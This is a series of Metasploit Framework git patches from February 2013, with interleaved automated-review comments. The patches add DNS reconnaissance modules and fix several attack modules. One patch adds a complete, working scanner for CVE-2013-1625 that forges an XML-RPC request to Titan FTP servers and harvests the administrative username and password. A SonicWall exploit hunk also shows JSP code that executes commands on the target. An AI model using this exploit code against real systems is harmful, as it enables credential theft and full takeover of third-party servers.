record[:host] = rr.exchange.gsub(/\.$/,'') + record[:type] = "MX" + record[:address] = 
ip[:address].to_s + results << record + end + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def switchdns() + print_status("Using DNS Server: #{datastore['NS']}") + @res.nameserver=(datastore['NS']) + @nsinuse = datastore['NS'] + end +end \ No newline at end of file From 256ab7f737ddf23f45741cfee9feed48658592b8 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 09:50:21 -0400 Subject: [PATCH 321/421] Split of DNS Reverse Lookup from enum_dns --- .../auxiliary/gather/dns_reverse_lookup.rb | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 modules/auxiliary/gather/dns_reverse_lookup.rb diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb new file mode 100644 index 000000000000..95dbb0c8ac80 --- /dev/null +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
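Review bot: `get_txt` never builds or returns a result list, yet `run` iterates `get_txt(datastore['DOMAIN']).each` and indexes `r[:host]` and `r[:address]`. The method's value is whatever `query.answer.each` returns (the raw answer records) or `nil` when the `if (query)` guard fails, so the loop in `run` either raises on `nil` or hands resource-record objects to `report_host`. Since `get_txt` already prints each record, call it on its own in `run` as `get_txt(datastore['DOMAIN'])`, or have it return hashes like the other `get_*` helpers, bearing in mind that a TXT record has no address to report. `wildcard` also reads `query.answer` without the `if (query)` guard the other helpers use.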
@@ -0,0 +1,94 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Reverse Lookup', + 'Description' => %q{ + This module performs a Reverse Lookup against a given IP Range. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptAddressRange.new('RANGE', [true, 'IP Range to perform reverse lookup against.', nil]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('THREADS', [ false, "Number of seconds to wait before doing a retry", 2]), + ], self.class) + end + + def run + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + @threadnum = datastore['THREADS'].to_i + switchdns() if not datastore['NS'].nil? 
+ reverselkp(datastore['RANGE']) + end + + #------------------------------------------------------------------------------- + def reverselkp(iprange) + print_status("Running Reverse Lookup against ip range #{iprange}") + ar = Rex::Socket::RangeWalker.new(iprange) + tl = [] + while (true) + # Spawn threads for each host + while (tl.length <= @threadnum) + ip = ar.next_ip + break if not ip + tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| + begin + query = @res.query(tip) + query.each_ptr do |addresstp| + print_status("Host Name: #{addresstp} IP Address: #{tip.to_s}") + + report_host( + :host => tip.to_s, + :name => addresstp + ) + end + rescue ::Interrupt + raise $! + rescue ::Rex::ConnectionError + rescue ::Exception => e + print_error("Error: #{tip}: #{e.message}") + elog("Error running against host #{tip}: #{e.message}\n#{e.backtrace.join("\n")}") + end + end + end + # Exit once we run out of hosts + if(tl.length == 0) + break + end + tl.first.join + tl.delete_if { |t| not t.alive? } + end + end + + #--------------------------------------------------------------------------------- + def switchdns() + print_status("Using DNS Server: #{datastore['NS']}") + @res.nameserver=(datastore['NS']) + @nsinuse = datastore['NS'] + end +end \ No newline at end of file From ac8194ed07b18e27c8d488590c5307b539650585 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 10:09:34 -0400 Subject: [PATCH 322/421] Split of DNS SRV Record Enumeration from enum_dns --- modules/auxiliary/gather/dns_srv.rb | 221 ++++++++++++++++++++++++++++ 1 file changed, 221 insertions(+) create mode 100644 modules/auxiliary/gather/dns_srv.rb diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb new file mode 100644 index 000000000000..dd3f68f208d7 --- /dev/null +++ b/modules/auxiliary/gather/dns_srv.rb 
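Review bot: The worker loop in `reverselkp` uses `while (tl.length <= @threadnum)`, which keeps THREADS + 1 lookups in flight; `while (tl.length < @threadnum)` matches the option. The THREADS option itself carries the RETRY_INTERVAL help text; `OptInt.new('THREADS', [ false, "Number of threads", 2])` would say what it does. In the thread body, `rescue ::Exception => e` also catches `SystemExit` and `NoMemoryError`; `rescue ::StandardError => e` is enough for per-host lookup errors.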
@@ -0,0 +1,221 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Reverse Lookup', + 'Description' => %q{ + This module enumerates common DNS Service Records. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name"]), + OptBool.new( 'ALL_NS', [ false, "Run against all Nameservers for the given domain",false]), + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 3]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 4]), + ], self.class) + end + + def run + records = [] + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + + print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") + records = records + srvqry(datastore['DOMAIN']) + if datastore["ALL_NS"] + get_soa(datastore['DOMAIN']).each do |s| + switchdns(s[:address]) + records = records + srvqry(datastore['DOMAIN']) + end + get_ns(datastore['DOMAIN']).each do |ns| + switchdns(ns[:address]) + records =records + srvqry(datastore['DOMAIN']) + end + end + records.uniq! 
+ records.each do |r| + print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") + report_service( + :host=> r[:address].to_s, + :port => r[:port].to_i, + :proto => r[:proto], + :name => r[:service], + :host_name => r[:host] + ) + report_host( + :host => r[:address].to_s, + :name => r[:host] + ) + end + + end + #--------------------------------------------------------------------------------- + def get_soa(target) + results = [] + query = @res.query(target, "SOA") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| + record = {} + record[:host] = rr.mname.gsub(/\.$/,'') + record[:type] = "SOA" + record[:address] = ip[:address].to_s + results << record + end + end + end + end + return results + end + #------------------------------------------------------------------------------- + def srvqry(dom) + results = [] + #Most common SRV Records + srvrcd = [ + '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', + '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', + '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', + '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', + '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', + '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', + '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', + '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', + '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', + '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', + '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', + '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', + '_jabber-client._tcp.', 
'_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', + '_ldap._tcp.ForestDNSZones.', '_ldap._tcp.dc._msdcs.', '_ldap._tcp.pdc._msdcs.', + '_ldap._tcp.gc._msdcs.','_kerberos._tcp.dc._msdcs.','_kpasswd._tcp.','_kpasswd._udp.' + ] + + srvrcd.each do |srvt| + trg = "#{srvt}#{dom}" + begin + + query = @res.query(trg , Net::DNS::SRV) + if query + query.answer.each do |srv| + if Rex::Socket.dotted_ip?(srv.host) + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = srv.host + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") + else + get_ip(srv.host.gsub(/\.$/,'')).each do |ip| + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = ip[:address] + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") + end + end + end + end + rescue + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + 
record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + return results + end + #--------------------------------------------------------------------------------- + def switchdns(ns) + vprint_status("Enumerating SRV Records on: #{ns}") + @res.nameserver=(ns) + @nsinuse = ns + end + + #--------------------------------------------------------------------------------- + def get_ns(target) + results = [] + query = @res.query(target, "NS") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record + end + end + end + return results + end +end \ No newline at end of file From e3ee0d79134137cffcb8db1b2d81be5013d61a49 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 8 Feb 2013 11:25:17 -0600 Subject: [PATCH 323/421] Don't try to download '.' or '..' as files --- modules/post/multi/gather/ssh_creds.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index 60638eece62a..46966745998c 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -61,11 +61,12 @@ def download_loot(paths) end files.each do |file| - print_good("Downloading #{path}#{sep}#{file} -> #{file}") + next if [".", ".."].include?(file) data = read_file("#{path}#{sep}#{file}") file = file.split(sep).last loot_path = store_loot("ssh.#{file}", "text/plain", session, data, "ssh_#{file}", "OpenSSH #{file} File") + print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}") # If the key is encrypted, this will fail and it won't be stored as a # cred. That's ok because we can't really use encrypted keys anyway. 
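Review bot: In `srvqry` the bare `rescue` with an empty body hides a real failure. `srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0]` is `nil` for the list entries `'_imap.tcp.'`, `'_kerberos.tcp.dc._msdcs.'` and `'_sip._tls.'`, so `srv_info[0]` raises `NoMethodError` and any answers for those names are dropped without a message. Correct `'_imap.tcp.'` to `'_imap._tcp.'`, drop `'_kerberos.tcp.dc._msdcs.'` (the correctly spelled `'_kerberos._tcp.dc._msdcs.'` is already in the list), skip a `nil` match explicitly, and narrow the handler to resolver errors with at least a `vprint_error`. The module `'Name'` is `'DNS Reverse Lookup'`, the same string dns_reverse_lookup.rb uses, which looks like a leftover.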
From 5b398076ae6acb8e72e861e182c0b3c24b26e9fd Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 8 Feb 2013 11:52:50 -0600 Subject: [PATCH 324/421] Couple of fixes for windows * Catch IOError when chmod doesn't exist (i.e. Windows) * Proper escaping for paths --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 4013bc95738e..d46541a0cb9b 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -229,7 +229,7 @@ def exploit_native def path_join(*paths) if target['Platform'] == "win" path = paths.join("\\") - path.gsub!(%r|\\+|, "\\") + path.gsub!(%r|\\+|, "\\\\\\\\") else path = paths.join("/") path.gsub!(%r|//+|, "/") @@ -269,7 +269,9 @@ def jsp_drop_bin(bin_data, output_file) def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| - jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|try {\n| + jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| From 8798567d799f873c082278e666d740be964936db Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 8 Feb 2013 12:05:27 -0600 Subject: [PATCH 325/421] Fix bug: TypeError can't convert Fixnum into String wmap_target_port is retrieved from datastore['RPORT'], and that's a Fixnum. But wmap_base_url is treating that like a String, so when a module uses that function, it's doomed. See: http://dev.metasploit.com/redmine/issues/7748 --- lib/msf/core/auxiliary/wmapmodule.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/lib/msf/core/auxiliary/wmapmodule.rb b/lib/msf/core/auxiliary/wmapmodule.rb index fe55d7747e60..7af067ed3efe 100644 --- a/lib/msf/core/auxiliary/wmapmodule.rb +++ b/lib/msf/core/auxiliary/wmapmodule.rb @@ -71,7 +71,7 @@ def wmap_base_url else res << datastore['VHOST'] end - res << ":" + wmap_target_port + res << ":" + wmap_target_port.to_s res end From 9b6f2fcd1de34a0cb4bd5a9d5b25438c7d3dd3fd Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 8 Feb 2013 12:10:42 -0600 Subject: [PATCH 326/421] Use the install path to tell us the separator Fixes the java target on windows victims --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index d46541a0cb9b..397116f37a6a 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -227,7 +227,7 @@ def exploit_native end def path_join(*paths) - if target['Platform'] == "win" + if install_path.include?("\\") path = paths.join("\\") path.gsub!(%r|\\+|, "\\\\\\\\") else From b8f0a94c3fcd18f505dc8f33486a6f2d7dee05d6 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 14:42:10 -0400 Subject: [PATCH 327/421] Fixed typos mentioned by Egypt --- modules/exploits/windows/local/persistence.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 942cd8f9df89..3bf17f4fa001 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb 
@@ -31,8 +31,6 @@ def initialize(info={}) at user logon or system startup depending on privilege and selected startup method. - REXE mode will transfer a binary of your choosing to remote host to be - used as a payload. }, 'License' => MSF_LICENSE, 'Author' => @@ -56,7 +54,7 @@ def initialize(info={}) end - # Run Method for when run command is issued + # Exploit Method for when run command is issued #------------------------------------------------------------------------------- def exploit print_status("Running module against #{sysinfo['Computer']}") @@ -253,4 +251,4 @@ def write_exe_to_target(exe_raw, rexename) end return tempexe end -end \ No newline at end of file +end From fea84cad10dfb7c1e1d785b7d0c420aabe813557 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 14:47:16 -0400 Subject: [PATCH 328/421] Fix additional typos per recomendation --- modules/exploits/windows/local/persistence.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 3bf17f4fa001..386d6900de4f 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -123,7 +123,7 @@ def exploit ) end - # Function for Creating persistent script + # Creates persistent script #------------------------------------------------------------------------------- def create_script(delay, altexe) if not altexe.nil? @@ -159,7 +159,7 @@ def log_file(log_path = nil) return logfile end - # Function for writing script to target host + # Writes script to target host #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) tempdir = session.fs.file.expand_path("%TEMP%") 
@@ -182,7 +182,7 @@ def write_script_to_target(vbs,name) return tempvbs end - # Function to execute script on target and return the PID of the process + # Executes script on target and return the PID of the process #------------------------------------------------------------------------------- def target_exec(script_on_target) execsuccess = true @@ -201,7 +201,7 @@ def target_exec(script_on_target) return execsuccess end - # Function to install payload in to the registry HKLM or HKCU + # Installs payload in to the registry HKLM or HKCU #------------------------------------------------------------------------------- def write_to_reg(key,script_on_target, registry_value) # Lets start to assume we had success. @@ -228,7 +228,7 @@ def write_to_reg(key,script_on_target, registry_value) end end - # Function for writing executable to target host + # Writesexecutable to target host #------------------------------------------------------------------------------- def write_exe_to_target(exe_raw, rexename) if rexename.nil? From 7522a87cf9a6d518ca8f8f017706f1a24d992248 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 8 Feb 2013 15:43:02 -0500 Subject: [PATCH 329/421] Adding an auxiliary scanner module for Titan FTP password disclosure. --- .../scanner/http/titan_ftp_admin_pwd.rb | 97 +++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb new file mode 100644 index 000000000000..0025d2a3cf54 --- /dev/null +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb 
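Review bot: The reworded comment `# Executes script on target and return the PID of the process` does not match the code around it: `target_exec` initialises `execsuccess = true` here and, per the context lines of the next hunk, ends with `return execsuccess`. A comment such as `# Executes the script on the target; returns true on success` would describe that value, assuming the part of the body outside the hunk sets it to false on failure. Most of the function body lies outside this hunk.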
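Review bot: The new comment `# Writesexecutable to target host` in the `@@ -228,7 +228,7 @@` hunk is missing a space; `# Writes executable to target host` matches the wording of the other comments touched in this commit. The body of `write_exe_to_target` continues outside the hunk.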
@@ -0,0 +1,97 @@ +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Titan FTP Administrative Password Disclosure', + 'Description' => %q{ + On Titan FTP servers prior to version 9.14.1628, an attacker can + retrieve the username and password for the administrative XML-RPC + interface, which listens on TCP Port 31001 by default, by sending an + XML request containing bogus authentication information. After sending + this request, the server responds with the legitimate username and + password for the service. With this information, an attacker has + complete control over the FTP service, which includes the ability to + add and remove FTP users, as well as add, remove, and modify + available directories and their permissions. + }, + 'Author' => + [ + 'Spencer McIntyre' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1625' ], + ], + ) + + register_options([Opt::RPORT(31001)], self.class) + deregister_options('PASSWORD', 'USERNAME') + end + + def run_host(ip) + res = send_request_cgi( + { + 'uri' => "/admin.dll", + 'method' => 'POST', + 'headers' => { + 'SRT-WantXMLResponses' => 'true', + 'SRT-XMLRequest' => 'true', + 'Authorization' => 'Basic FAKEFAKE' + }, + 'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>", + }) + return if not res + + if res.code == 400 + vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched") + return + elsif res.code != 200 + vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}") + return + end + + xml_data = res.body.strip + resp_root = REXML::Document.new(xml_data).root + + srresponse = resp_root.elements.to_a("//SRResponse")[0] + srdomainparams = 
srresponse.elements.to_a("//SRDomainParams")[0] + + info = {} + srdomainparams.elements.each do |node| + case node.name + when "DomainName" + info[:domain] = Rex::Text.uri_decode(node.text) + when "BaseDataDir" + info[:basedir] = Rex::Text.uri_decode(node.text) + when "CreationDate" + info[:username] = Rex::Text.uri_decode(node.text) + when "CreationTime" + info[:password] = Rex::Text.uri_decode(node.text) + end + end + + if (info[:username] and info[:password]) + if (info[:domain] and info[:basedir]) + print_good("#{ip}:#{datastore['RPORT']} - Domain: #{info[:domain]} Base Directory: #{info[:basedir]}") + end + print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: #{info[:username]} #{info[:password]}") + report_auth_info( + :host => ip, + :port => datastore['RPORT'], + :user => info[:username], + :pass => info[:password], + :ptype => "password", + :proto => "http", + :sname => "Titan FTP Admin Console" + ) + end + end +end From 7370d7d31b0d123732f113d855c0d8dafd3b3f87 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 8 Feb 2013 18:21:06 -0600 Subject: [PATCH 330/421] Final touchup --- .../auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 0025d2a3cf54..4d18e2dc74d6 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'rexml/document' 
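Review bot: `run_host` parses the body returned by an arbitrary scanned host with no error handling. `REXML::Document.new(xml_data).root` raises `REXML::ParseException` on malformed XML, and `resp_root`, `srresponse` or `srdomainparams` is `nil` whenever a 200 response is not the expected document, so the following `.elements` call raises `NoMethodError`. Rescue the parse error and return early when any of the three lookups comes back `nil`, as sketched below. Both status messages also misspell "Responded" as "Responeded".

```ruby
xml_data = res.body.strip
begin
  resp_root = REXML::Document.new(xml_data).root
rescue REXML::ParseException => e
  vprint_error("#{ip}:#{datastore['RPORT']} - Unparseable response: #{e.message}")
  return
end
return if resp_root.nil?

srresponse = resp_root.elements.to_a("//SRResponse")[0]
return if srresponse.nil?
srdomainparams = srresponse.elements.to_a("//SRDomainParams")[0]
return if srdomainparams.nil?
# … unchanged: walk srdomainparams and report the values found …
```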
@@ -80,9 +87,10 @@ def run_host(ip) if (info[:username] and info[:password]) if (info[:domain] and info[:basedir]) - print_good("#{ip}:#{datastore['RPORT']} - Domain: #{info[:domain]} Base Directory: #{info[:basedir]}") + print_good("#{ip}:#{datastore['RPORT']} - Domain: #{info[:domain]}") + print_good("#{ip}:#{datastore['RPORT']} - Base Directory: #{info[:basedir]}") end - print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: #{info[:username]} #{info[:password]}") + print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'") report_auth_info( :host => ip, :port => datastore['RPORT'], From 166b59b61a21674ef6aaacbdd47c44868fd32454 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:48:57 -0400 Subject: [PATCH 331/421] Added new line to end of file. --- modules/auxiliary/gather/dns_info.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index bbf772cf5b32..f57fb1649f2a 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -215,4 +215,5 @@ def switchdns() @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end -end \ No newline at end of file +end + From eda3fc07157f6717f03346e2f6f914586e1396e1 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:50:23 -0400 Subject: [PATCH 332/421] Added new line to end of file. --- modules/auxiliary/gather/dns_srv.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index dd3f68f208d7..4bbccba51835 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -218,4 +218,5 @@ def get_ns(target) end return results end -end \ No newline at end of file +end + 
From 78f81843f6348b04715b662be5b24bf2cf8a881a Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:51:37 -0400 Subject: [PATCH 333/421] Added new line to end of file. --- modules/auxiliary/gather/dns_bruteforce.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index a6e72080a6a9..0c289eddb3a9 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -135,3 +135,4 @@ def dnsbrt(domain) end end end + From fd15436a9669884125e71fe9a01e89865b12af62 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:52:49 -0400 Subject: [PATCH 334/421] Added new line to end of file. --- modules/auxiliary/gather/dns_reverse_lookup.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 95dbb0c8ac80..e3e28342a678 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -91,4 +91,5 @@ def switchdns() @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end -end \ No newline at end of file +end + From 63c67914739083aa4c21acc88094bf0300ac065e Mon Sep 17 00:00:00 2001 From: m-1-k-3 <github@s3cur1ty.de> Date: Sat, 9 Feb 2013 11:17:02 +0100 Subject: [PATCH 335/421] return --- modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index feea8e0d3e4d..2c0da88e4f7f 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb 
@@ -60,7 +60,7 @@ def run rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return :abort + return end if res.body.include? "end" From 5b576c1ed061d30bd2b26479e22f564631d24073 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 9 Feb 2013 17:40:45 +0100 Subject: [PATCH 336/421] fix ident and make happy msftidy --- .../browser/novell_groupwise_gwcls1_actvx.rb | 309 ++++++++++++++++++ 1 file changed, 309 insertions(+) create mode 100644 modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb new file mode 100644 index 000000000000..a3f50861e8ba --- /dev/null +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb 
